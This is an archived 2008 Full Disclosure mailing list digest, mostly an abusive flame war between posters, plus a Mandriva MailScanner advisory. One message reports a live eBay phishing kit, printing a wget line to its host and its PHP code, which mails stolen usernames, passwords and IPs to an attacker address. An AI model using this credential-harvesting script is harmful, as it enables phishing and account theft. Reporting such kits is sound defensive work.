Full Disclosure mailing list archives
Re: Full-Disclosure Digest, Vol 46, Issue 43
From: "Dowling, Gabrielle" <gdowling () proskauer com>
Date: Tue, 23 Dec 2008 00:23:48 -0500
You know, the discourse on this list singiularly manifests the problems in it security these days. I have remained subscribed for a couple of years as I thought there was occasaional snippets of useful informatiion, . There obviously is no reason to continue here. This list has devolved to an argument between nt whateber and urleet. I cannot remember something important was broached on this list'. If security is important, how do we allow it to be so trivialized by the comments on this forum, and how do we get our budgets through in such a harsh econo$y? -------------------------- Sent from my BlackBerry Wireless Handheld ----- Original Message ----- From: full-disclosure-bounces () lists grok org uk <full-disclosure-bounces () lists grok org uk> To: full-disclosure () lists grok org uk <full-disclosure () lists grok org uk> Sent: Mon Dec 22 18:12:41 2008 Subject: Full-Disclosure Digest, Vol 46, Issue 43 Send Full-Disclosure mailing list submissions to full-disclosure () lists grok org uk To subscribe or unsubscribe via the World Wide Web, visit https://lists.grok.org.uk/mailman/listinfo/full-disclosure or, via email, send a message with subject or body 'help' to full-disclosure-request () lists grok org uk You can reach the person managing the list at full-disclosure-owner () lists grok org uk When replying, please edit your Subject line so it is more specific than "Re: Contents of Full-Disclosure digest..." Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you. Today's Topics: 1. Re: Microsoft issues out-of-band patch (j-f sentier) 2. Re: Microsoft issues out-of-band patch (n3td3v) 3. Re: Microsoft issues out-of-band patch (Bipin Gautam) 4. Fresh Phish anyone? (Kevin Finisterre (lists)) 5. Re: o lookie, n3td3v is lying elsewhere now (Ureleet) 6. Re: Microsoft issues out-of-band patch (Ureleet) 7. Re: Microsoft issues out-of-band patch (Ureleet) 8. Re: Microsoft issues out-of-band patch (Ureleet) 9. Re: Microsoft issues out-of-band patch (Ureleet) 10. Re: o lookie, n3td3v is lying elsewhere now (n3td3v) 11. Re: o lookie, n3td3v is lying elsewhere now (n3td3v) 12. Re: Hotmail easter-egg found using Tamper Data.... (James Matthews) 13. [ MDVA-2008:241 ] mailscanner (security () mandriva com) 14. Re: o lookie, n3td3v is lying elsewhere now (n3td3v) 15. Re: o lookie, n3td3v is lying elsewhere now (Everett Maus) 16. Re: o lookie, n3td3v is lying elsewhere now (waveroad waveroad) 17. Re: o lookie, n3td3v is lying elsewhere now (n3td3v) 18. Re: o lookie, n3td3v is lying elsewhere now (n3td3v) 19. Re: Fresh Phish anyone? (anonymous pimp) 20. Re: Fresh Phish anyone? (Kevin Finisterre (lists)) 21. Re: Fresh Phish anyone? (n3td3v) 22. Re: o lookie, n3td3v is lying elsewhere now (j-f sentier) 23. Re: Fresh Phish anyone? (Valdis.Kletnieks () vt edu) 24. Re: Fresh Phish anyone? (j-f sentier) 25. This list has run its course (n3td3v) 26. Re: Fresh Phish anyone? (n3td3v) 27. Re: This list has run its course (n3td3v) 28. Barracuda Reputation Block List (Elazar Broad) ---------------------------------------------------------------------- Message: 1 Date: Mon, 22 Dec 2008 12:56:19 -0500 From: "j-f sentier" <j.sentiar () gmail com> Subject: Re: [Full-disclosure] Microsoft issues out-of-band patch To: n3td3v <xploitable () gmail com>, full-disclosure () lists grok org uk Message-ID: <6f80feaf0812220956r1de6cb2dnf51c5d82ffa04553 () mail gmail com> Content-Type: text/plain; charset="iso-8859-1" Who will be dumb enough to give a job to a piece of shit like you ? 2008/12/22, n3td3v <xploitable () gmail com>:
Maybe MI5 will tap me on the shoulder and offer me a job. :) On Mon, Dec 22, 2008 at 5:13 PM, Udi Shamir <udishamir () yahoo com> wrote:There is always singing bird but the odds are thin Sent from my iPhone On Dec 22, 2008, at 19:10, n3td3v <xploitable () gmail com> wrote: On Mon, Dec 22, 2008 at 4:44 PM, Michael Krymson <krymson () gmail com>wrote:Fact? Now you're really needing to cite some sources or backing,otherwisethis is, in fact, not fact. Where would I get the source from if its a secret intelligence agency? Find an MI5 spy out of a hat and tell him to come on full-disclosure to back me up? Unlikely to happen, no? _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081222/b12de591/attachment-0001.html ------------------------------ Message: 2 Date: Mon, 22 Dec 2008 18:16:43 +0000 From: n3td3v <xploitable () gmail com> Subject: Re: [Full-disclosure] Microsoft issues out-of-band patch To: "j-f sentier" <j.sentiar () gmail com>, full-disclosure () lists grok org uk Message-ID: <4b6ee9310812221016j7771c236v12e2a828d52768b7 () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 MI5 On Mon, Dec 22, 2008 at 5:56 PM, j-f sentier <j.sentiar () gmail com> wrote:
Who will be dumb enough to give a job to a piece of shit like you ? 2008/12/22, n3td3v <xploitable () gmail com>:Maybe MI5 will tap me on the shoulder and offer me a job. :) On Mon, Dec 22, 2008 at 5:13 PM, Udi Shamir <udishamir () yahoo com> wrote:There is always singing bird but the odds are thin Sent from my iPhone On Dec 22, 2008, at 19:10, n3td3v <xploitable () gmail com> wrote: On Mon, Dec 22, 2008 at 4:44 PM, Michael Krymson <krymson () gmail com> wrote: Fact? Now you're really needing to cite some sources or backing, otherwise this is, in fact, not fact. Where would I get the source from if its a secret intelligence agency? Find an MI5 spy out of a hat and tell him to come on full-disclosure to back me up? Unlikely to happen, no? _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
------------------------------ Message: 3 Date: Tue, 23 Dec 2008 00:09:31 +0545 From: "Bipin Gautam" <bipin.gautam () gmail com> Subject: Re: [Full-disclosure] Microsoft issues out-of-band patch To: "j-f sentier" <j.sentiar () gmail com> Cc: full-disclosure () lists grok org uk Message-ID: <754924960812221024s6dba9446j884886204fd6284e () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 Stop acting like in adolescence. I am 23, how old are you guys? DONT YOU GET IT, FD is a "professional forum" for GOD's shake! ------------------------------ Message: 4 Date: Mon, 22 Dec 2008 13:32:50 -0500 From: "Kevin Finisterre (lists)" <kf_lists () digitalmunition com> Subject: [Full-disclosure] Fresh Phish anyone? To: Full Disclosure <full-disclosure () lists grok org uk> Message-ID: <7E85B3DA-8312-4DE9-AA93-E62157E76EE8 () digitalmunition com> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes
Someone is bored and out making the rounds exploiting random asp pages and web-services. wget http://www.adehkz.net/eb.zip <?php session_start(); $userid = $_POST['userid']; $password = $_POST['password']; $ip = getenv("REMOTE_ADDR"); $subj = "eB - $userid"; $msg = "Username: $userid\nPassword: $password\n....\nIP: $ip"; mail("asdfwr () gmail com", $subj, $msg); header("Location: https://signin.ebay.com/ws/eBayISAPI.dll?SignIn&errmsg=8&pUserId=&co_partnerId=2&siteid=0&pageType=1883&pa1=&i1=-1&UsingSSL=1&bshowgif=0&favoritenav=&ru=http%3A%2F%2Fmy.ebay.com%2Fws%2FeBayISAPI.dll%3FMyeBay&pp=&migrateVisitor=1 "); ?> I passed this on to the SANS handlers a few days ago but the site is still up and running. Enjoy -KF ------------------------------ Message: 5 Date: Mon, 22 Dec 2008 14:17:09 -0500 From: Ureleet <ureleet () gmail com> Subject: Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now To: n3td3v <xploitable () gmail com> Cc: full-disclosure () lists grok org uk Message-ID: <6158bb410812221117j4201ee6ep2045482de5c99a5 () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 On Mon, Dec 22, 2008 at 8:33 AM, n3td3v <xploitable () gmail com> wrote:
On Mon, Dec 22, 2008 at 1:26 PM, Ureleet <ureleet () gmail com> wrote:u say u r a badass hackerWhen?
o, i m sure someone who has more time on their hands could at least find references where u claim 2 b an eleet hax0r. this is a favorite of mine tho: http://forum.crime-research.org/-vp3073.html?sid=172c1ebba153817877ca67d3de837933 ------------------------------ Message: 6 Date: Mon, 22 Dec 2008 14:18:31 -0500 From: Ureleet <ureleet () gmail com> Subject: Re: [Full-disclosure] Microsoft issues out-of-band patch To: n3td3v <xploitable () gmail com> Cc: full-disclosure () lists grok org uk Message-ID: <6158bb410812221118t247acf7etbb1cf7c996f9fce8 () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 On Mon, Dec 22, 2008 at 12:10 PM, n3td3v <xploitable () gmail com> wrote:
On Mon, Dec 22, 2008 at 4:44 PM, Michael Krymson <krymson () gmail com> wrote:Fact? Now you're really needing to cite some sources or backing, otherwise this is, in fact, not fact.Where would I get the source from if its a secret intelligence agency? Find an MI5 spy out of a hat and tell him to come on full-disclosure to back me up? Unlikely to happen, no?
so u just lied agin? publicaly? while u say things r fact, and they are in fact not fact? when do we take u srsly? stop lying. ------------------------------ Message: 7 Date: Mon, 22 Dec 2008 14:18:44 -0500 From: Ureleet <ureleet () gmail com> Subject: Re: [Full-disclosure] Microsoft issues out-of-band patch To: "Bipin Gautam" <bipin.gautam () gmail com> Cc: full-disclosure () lists grok org uk Message-ID: <6158bb410812221118x21acc2f7te314f728bdfb0731 () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 On Mon, Dec 22, 2008 at 1:24 PM, Bipin Gautam <bipin.gautam () gmail com> wrote:
Stop acting like in adolescence. I am 23, how old are you guys? DONT YOU GET IT, FD is a "professional forum" for GOD's shake!
since when? ------------------------------ Message: 8 Date: Mon, 22 Dec 2008 14:19:18 -0500 From: Ureleet <ureleet () gmail com> Subject: Re: [Full-disclosure] Microsoft issues out-of-band patch To: n3td3v <xploitable () gmail com> Cc: full-disclosure () lists grok org uk Message-ID: <6158bb410812221119p3eb67698pf9eeef8222191df2 () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 On Mon, Dec 22, 2008 at 1:16 PM, n3td3v <xploitable () gmail com> wrote:
MI5 On Mon, Dec 22, 2008 at 5:56 PM, j-f sentier <j.sentiar () gmail com> wrote:Who will be dumb enough to give a job to a piece of shit like you ?
so now u say u work for mi5? any1 else read that like i just did? ------------------------------ Message: 9 Date: Mon, 22 Dec 2008 14:19:36 -0500 From: Ureleet <ureleet () gmail com> Subject: Re: [Full-disclosure] Microsoft issues out-of-band patch To: n3td3v <xploitable () gmail com> Cc: full-disclosure () lists grok org uk Message-ID: <6158bb410812221119p31394632m4bca0cbb8f771eec () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 On Mon, Dec 22, 2008 at 12:39 PM, n3td3v <xploitable () gmail com> wrote:
Maybe MI5 will tap me on the shoulder and offer me a job. :)
u wish kid. ------------------------------ Message: 10 Date: Mon, 22 Dec 2008 19:38:10 +0000 From: n3td3v <xploitable () gmail com> Subject: Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now To: Ureleet <ureleet () gmail com>, full-disclosure () lists grok org uk Message-ID: <4b6ee9310812221138l390f4f62x81108af9f835365 () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 On Mon, Dec 22, 2008 at 7:17 PM, Ureleet <ureleet () gmail com> wrote:
On Mon, Dec 22, 2008 at 8:33 AM, n3td3v <xploitable () gmail com> wrote:On Mon, Dec 22, 2008 at 1:26 PM, Ureleet <ureleet () gmail com> wrote:u say u r a badass hackerWhen?o, i m sure someone who has more time on their hands could at least find references where u claim 2 b an eleet hax0r. this is a favorite of mine tho: http://forum.crime-research.org/-vp3073.html?sid=172c1ebba153817877ca67d3de837933
If only you knew t34ch_m3_h0w_t0_h4ck is a Yahoo! employee and I was making fun of it while trying to get intelligence on folks from that forum. We used to collect intelligence together and information share about hackers. You can contact t34ch_m3_h0w_t0_h4ck here: http://metal.hurlant.com/blog/ Or email him here: henri_torgemane () yahoo com Or his corporate email at henrit () yahoo-inc com if you don't believe me. I have never told a lie... ------------------------------ Message: 11 Date: Mon, 22 Dec 2008 19:44:53 +0000 From: n3td3v <xploitable () gmail com> Subject: Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now To: "Ben Preston" <benjamin.preston () gmail com>, full-disclosure () lists grok org uk Message-ID: <4b6ee9310812221144n3884c54ft1acf7886f3ea8628 () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 The group is not for youngsters its for serious intelligencers, any youngsters who join get banned. On Mon, Dec 22, 2008 at 7:42 PM, Ben Preston <benjamin.preston () gmail com> wrote:
No, they subscribed because they were hoping it would be the same un-tellectual junkshow that they get to see on FD. You're the only one making any noise on it so it turns out to be more like watching a mental patient through a one-way mirror. You manage to lure in impressionable youngsters and those who lack experience with English who have no idea that you're just spewing nonsense. They seem to be part of the few who engage in thread conversations in your group, however briefly. They catch on pretty quick. Please stop bloviating about your silly "group". It's not lending you any credence. Warmest regards, -- Ben
------------------------------ Message: 12 Date: Mon, 22 Dec 2008 21:55:17 +0200 From: "James Matthews" <nytrokiss () gmail com> Subject: Re: [Full-disclosure] Hotmail easter-egg found using Tamper Data.... To: "Stephen Menard" <smenard () nbnet nb ca> Cc: full-disclosure () lists grok org uk Message-ID: <8a6b8e350812221155x40f46009ye97414f923adb008 () mail gmail com> Content-Type: text/plain; charset="koi8-r" It's quite cute :) Nice to know someone at microsoft has a lighter side. On Sun, Dec 21, 2008 at 11:52 PM, Stephen Menard <smenard () nbnet nb ca>wrote:
Kristo pher wrote:You need to obscure the images you post to FD better my friend. Forexample, I can tell that you are a PhD student at University College London, Faculty of Biomedical Sciences, Institute of Neurology Department of Brain Repair & Rehabilitation and your alternative email is m.machizawa () ucl ac uk????? Mail.Ru ????? ? ??????! http://r.mail.ru/cln4786/agent.mail.ru/ru/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/what tool[s] allows you to access this [?meta data?] from the posting pleass? _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-- http://www.astorandblack.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081222/ca62e4d3/attachment-0001.html ------------------------------ Message: 13 Date: Mon, 22 Dec 2008 13:07:00 -0700 From: security () mandriva com Subject: [Full-disclosure] [ MDVA-2008:241 ] mailscanner To: full-disclosure () lists grok org uk Message-ID: <E1LEr3M-0007uT-O6 () titan mandriva com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVA-2008:241 http://www.mandriva.com/security/ _______________________________________________________________________ Package : mailscanner Date : December 22, 2008 Affected: Corporate 4.0 _______________________________________________________________________ Problem Description: Local users can use symlink attacks throughout a flaw on trend-autoupdate script of MailScanner by using /tmp/opr.ini.##### or /tmp/lpt temporary file (CVE-2008-5140). Local users can use symlink attacks throughout flaws on clamav-autoupdate, panda-autoupdate and rav-autoupdate scripts of MailScanner by using ClamAV.update.log, pav.zip and RavBusy.lock temporary files (CVE-2008-5312). Local users can use symlink attacks throughout flaws on kaspersky-wrapper, bitdefender-wrapper, rav-wrapper scripts and Quarentine.pm, TNEF.pm, SA.pm, WorkArea.pm MailScanner perl modules by using kavoutput.tmp.27073, log.bdc.27073, report.vir.27073, MailScanner.ownertest.27073, tnef.27073 and MS.bayes.rebuild.lock temporary files (CVE-2008-5313). Further MailScanner had symlink flaws on antivir-autoupdate, bitdefender-autoupdate, clamav-autoupdate, etrust-autoupdate, generic-autoupdate, inoculan-autoupdate, kaspersky-autoupdate, nod32-autoupdate, norman-autoupdate, rav-autoupdate, sophos-autoupdate, symscanengine-autoupdate, vexira-autoupdate, f-prot-autoupdate and css-autoupdate scripts under following temporary vulnerable files: AntiVirBusy.lock, BitDefenderBusy.lock, ClamAVBusy.lock, eTrustBusy.lock, GenericBusy.lock, InoculanBusy.lock, KasperskyBusy.lock, Nod32Busy.lock, NormanBusy.lock, RavBusy.lock, SophosBusy.lock, SymScanEngineBusy.lock, VexiraBusy.lock, FProtBusy.lock and SYMCScan.lock. This update provides fix for all symlink flaws described on this security advisory. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5140 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5312 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5313 _______________________________________________________________________ Updated Packages: Corporate 4.0: 4e93bc7c48ec8f65122d263237b99ec9 corporate/4.0/i586/mailscanner-4.55.9_1-3.1.20060mlcs4.noarch.rpm f92acdbed4f63778609726eaa2dc8fd1 corporate/4.0/i586/mailscanner-spamassassin-4.55.9_1-3.1.20060mlcs4.noarch.rpm 35f1b7e0cc1534def4394e7bec95ab48 corporate/4.0/SRPMS/mailscanner-4.55.9_1-3.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 4e93bc7c48ec8f65122d263237b99ec9 corporate/4.0/x86_64/mailscanner-4.55.9_1-3.1.20060mlcs4.noarch.rpm f92acdbed4f63778609726eaa2dc8fd1 corporate/4.0/x86_64/mailscanner-spamassassin-4.55.9_1-3.1.20060mlcs4.noarch.rpm 35f1b7e0cc1534def4394e7bec95ab48 corporate/4.0/SRPMS/mailscanner-4.55.9_1-3.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJT8jcmqjQ0CJFipgRArRHAKDH4O/m1AfoakbcAK7monhnYH5eywCg8m1k OPwl0ksaHvGa9rLs78PtnwQ= =St+b -----END PGP SIGNATURE----- ------------------------------ Message: 14 Date: Mon, 22 Dec 2008 20:12:22 +0000 From: n3td3v <xploitable () gmail com> Subject: Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now To: "Everett Maus" <them.root () gmail com>, full-disclosure () lists grok org uk Message-ID: <4b6ee9310812221212r661ce6c9v184d33bf67d464be () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 Maybe it's the "n3td3v"? On Mon, Dec 22, 2008 at 8:07 PM, Everett Maus <them.root () gmail com> wrote:
Could've fooled me. n3td3v wrote:The group is not for youngsters its for serious intelligencers, any youngsters who join get banned. On Mon, Dec 22, 2008 at 7:42 PM, Ben Preston <benjamin.preston () gmail com> wrote:No, they subscribed because they were hoping it would be the same un-tellectual junkshow that they get to see on FD. You're the only one making any noise on it so it turns out to be more like watching a mental patient through a one-way mirror. You manage to lure in impressionable youngsters and those who lack experience with English who have no idea that you're just spewing nonsense. They seem to be part of the few who engage in thread conversations in your group, however briefly. They catch on pretty quick. Please stop bloviating about your silly "group". It's not lending you any credence. Warmest regards, -- Ben_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
------------------------------ Message: 15 Date: Mon, 22 Dec 2008 15:07:31 -0500 From: Everett Maus <them.root () gmail com> Subject: Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now To: n3td3v <xploitable () gmail com> Cc: full-disclosure () lists grok org uk Message-ID: <494FF383.4080907 () gmail com> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Could've fooled me. n3td3v wrote:
The group is not for youngsters its for serious intelligencers, any youngsters who join get banned. On Mon, Dec 22, 2008 at 7:42 PM, Ben Preston <benjamin.preston () gmail com> wrote:No, they subscribed because they were hoping it would be the same un-tellectual junkshow that they get to see on FD. You're the only one making any noise on it so it turns out to be more like watching a mental patient through a one-way mirror. You manage to lure in impressionable youngsters and those who lack experience with English who have no idea that you're just spewing nonsense. They seem to be part of the few who engage in thread conversations in your group, however briefly. They catch on pretty quick. Please stop bloviating about your silly "group". It's not lending you any credence. Warmest regards, -- Ben_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
------------------------------ Message: 16 Date: Mon, 22 Dec 2008 15:15:47 -0500 From: "waveroad waveroad" <waveroad () gmail com> Subject: Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now To: full-disclosure () lists grok org uk Message-ID: <296a304a0812221215y5f4afcb5sb78aa64e16909551 () mail gmail com> Content-Type: text/plain; charset="iso-8859-1" Mine is that one: http://www.bigblueball.com/forums/search.php?searchid=903472 http://www.bigblueball.com/forums/bigblueball-lounge/27558-n3td3vs-reputation-d.html etc .. N3td3v's quote of the day : "Trust me, if you want to be rude, i'll be rude back to you, and if you keep doing it, i'll make sure this website gets hacked." (http://www.bigblueball.com/forums/forum-support/28972-serious-post.html) It's funny to hear that from a guy who say: "we're letting the bad guys win, whitehat powaa, i'm serious, MI5 will hire me one day, etc" 2008/12/22 Ureleet <ureleet () gmail com>
this is a favorite of mine tho: http://forum.crime-research.org/-vp3073.html?sid=172c1ebba153817877ca67d3de837933 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081222/a71af368/attachment-0001.html ------------------------------ Message: 17 Date: Mon, 22 Dec 2008 20:31:16 +0000 From: n3td3v <xploitable () gmail com> Subject: Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now To: "waveroad waveroad" <waveroad () gmail com>, full-disclosure () lists grok org uk Message-ID: <4b6ee9310812221231q52f0ff59mf15365962f26e9cd () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 Looks like you've been joe jobbed, not just the folks on that forum. On Mon, Dec 22, 2008 at 8:15 PM, waveroad waveroad <waveroad () gmail com> wrote:
Mine is that one: http://www.bigblueball.com/forums/search.php?searchid=903472 http://www.bigblueball.com/forums/bigblueball-lounge/27558-n3td3vs-reputation-d.html etc .. N3td3v's quote of the day : "Trust me, if you want to be rude, i'll be rude back to you, and if you keep doing it, i'll make sure this website gets hacked." (http://www.bigblueball.com/forums/forum-support/28972-serious-post.html) It's funny to hear that from a guy who say: "we're letting the bad guys win, whitehat powaa, i'm serious, MI5 will hire me one day, etc" 2008/12/22 Ureleet <ureleet () gmail com>this is a favorite of mine tho: http://forum.crime-research.org/-vp3073.html?sid=172c1ebba153817877ca67d3de837933 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
------------------------------ Message: 18 Date: Mon, 22 Dec 2008 20:57:47 +0000 From: n3td3v <xploitable () gmail com> Subject: Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now To: full-disclosure () lists grok org uk Message-ID: <4b6ee9310812221257l60e23b0brdff04e8eb176bf33 () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 And the folks who are subscribed to "funsec" have been lured in by Gadi Evron. Look's like the intelligence services have got all their bases covered. Likewise, you've all been lured into Full-disclosure and Bugtraq, but what's *really* going on? Take it easy, On Mon, Dec 22, 2008 at 8:12 PM, n3td3v <xploitable () gmail com> wrote:
Maybe it's the "n3td3v"? On Mon, Dec 22, 2008 at 8:07 PM, Everett Maus <them.root () gmail com> wrote:Could've fooled me. n3td3v wrote:The group is not for youngsters its for serious intelligencers, any youngsters who join get banned. On Mon, Dec 22, 2008 at 7:42 PM, Ben Preston <benjamin.preston () gmail com> wrote:No, they subscribed because they were hoping it would be the same un-tellectual junkshow that they get to see on FD. You're the only one making any noise on it so it turns out to be more like watching a mental patient through a one-way mirror. You manage to lure in impressionable youngsters and those who lack experience with English who have no idea that you're just spewing nonsense. They seem to be part of the few who engage in thread conversations in your group, however briefly. They catch on pretty quick. Please stop bloviating about your silly "group". It's not lending you any credence. Warmest regards, -- Ben_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
------------------------------ Message: 19 Date: Mon, 22 Dec 2008 23:24:04 +0200 From: "anonymous pimp" <anonymouspimp () gmail com> Subject: Re: [Full-disclosure] Fresh Phish anyone? To: "Kevin Finisterre (lists)" <kf_lists () digitalmunition com> Cc: Full Disclosure <full-disclosure () lists grok org uk> Message-ID: <2d792fb20812221324q591946deh32e7ec03c3bfe44f () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 What kind of a skiddie fuck sends every phished account to his email? This is the kind of phish every 12 year old kid on both sides of Turkey uses. Is this supposed to make you seem smart? gtfo of fd. ------------------------------ Message: 20 Date: Mon, 22 Dec 2008 16:30:03 -0500 From: "Kevin Finisterre (lists)" <kf_lists () digitalmunition com> Subject: Re: [Full-disclosure] Fresh Phish anyone? To: Full Disclosure <full-disclosure () lists grok org uk> Message-ID: <4D08E454-3534-4DB4-B589-161DC976D8AF () digitalmunition com> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes On Dec 22, 2008, at 4:24 PM, anonymous pimp wrote:
What kind of a skiddie fuck sends every phished account to his email?
Who the hell knows... maybe someone here that was bored is interested in looking into that.
This is the kind of phish every 12 year old kid on both sides of Turkey uses.
Sweet, is knowing that supposed to make you look like a ninja?
Is this supposed to make you seem smart?
Yup.... see how s m r t I be
gtfo of fd.
No problem... I'd been away for some time now. Sorry I bothered dropping in. -KF ------------------------------ Message: 21 Date: Mon, 22 Dec 2008 21:53:29 +0000 From: n3td3v <xploitable () gmail com> Subject: Re: [Full-disclosure] Fresh Phish anyone? To: kf_lists () digitalmunition com, full-disclosure () lists grok org uk Message-ID: <4b6ee9310812221353u15d9c055sbcf6ecfb533a0603 () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 On Mon, Dec 22, 2008 at 9:30 PM, Kevin Finisterre (lists) <kf_lists () digitalmunition com> wrote:
gtfo of fd.No problem... I'd been away for some time now. Sorry I bothered dropping in. -KF
Don't worry, they tell me to GTFO of FD as well. It seems the real researchers aren't welcome here anymore. :( ------------------------------ Message: 22 Date: Mon, 22 Dec 2008 17:34:06 -0500 From: "j-f sentier" <j.sentiar () gmail com> Subject: Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now To: n3td3v <xploitable () gmail com>, full-disclosure () lists grok org uk Message-ID: <6f80feaf0812221434o4232c660j65375aacefcddad0 () mail gmail com> Content-Type: text/plain; charset="iso-8859-1" When we look what you say in december 2008, and the look at your posts on that forum in 2004, it's impossible to believe one second that it's not you. 2008/12/22 n3td3v <xploitable () gmail com>
Looks like you've been joe jobbed, not just the folks on that forum. On Mon, Dec 22, 2008 at 8:15 PM, waveroad waveroad <waveroad () gmail com> wrote:Mine is that one: http://www.bigblueball.com/forums/search.php?searchid=903472http://www.bigblueball.com/forums/bigblueball-lounge/27558-n3td3vs-reputation-d.htmletc .. N3td3v's quote of the day : "Trust me, if you want to be rude, i'll berudeback to you, and if you keep doing it, i'll make sure this website gets hacked." (http://www.bigblueball.com/forums/forum-support/28972-serious-post.html)It's funny to hear that from a guy who say: "we're letting the bad guyswin,whitehat powaa, i'm serious, MI5 will hire me one day, etc" 2008/12/22 Ureleet <ureleet () gmail com>this is a favorite of mine tho:http://forum.crime-research.org/-vp3073.html?sid=172c1ebba153817877ca67d3de837933_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081222/45421c02/attachment-0001.html ------------------------------ Message: 23 Date: Mon, 22 Dec 2008 17:42:24 -0500 From: Valdis.Kletnieks () vt edu Subject: Re: [Full-disclosure] Fresh Phish anyone? To: full-disclosure () lists grok org uk Message-ID: <5140.1229985744 () turing-police cc vt edu> Content-Type: text/plain; charset="us-ascii" On Mon, 22 Dec 2008 21:53:29 GMT, n3td3v said:
It seems the real researchers aren't welcome here anymore.
How does that follow from your experience here, given that you claim to be a blogger rather than an actual serious researcher? (And before you say "but I *am* a researcher", keep in mind that many on the list will immediately counter "researching what?") -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081222/997984d5/attachment-0001.bin ------------------------------ Message: 24 Date: Mon, 22 Dec 2008 17:44:00 -0500 From: "j-f sentier" <j.sentiar () gmail com> Subject: Re: [Full-disclosure] Fresh Phish anyone? To: n3td3v <xploitable () gmail com>, full-disclosure () lists grok org uk Message-ID: <6f80feaf0812221444v22ae2562rada181184b8f36c8 () mail gmail com> Content-Type: text/plain; charset="iso-8859-1" Kevin is a good security researcher, but you n3td3v you are only a good trouble researcher. Let us see one poc, some code, something innovating come on, we're waiting to see this since 6 years. You think you know something about security because you feel safe behind 